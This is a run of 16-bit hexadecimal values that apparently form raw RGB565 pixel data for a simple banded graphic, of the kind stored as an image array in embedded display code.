0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 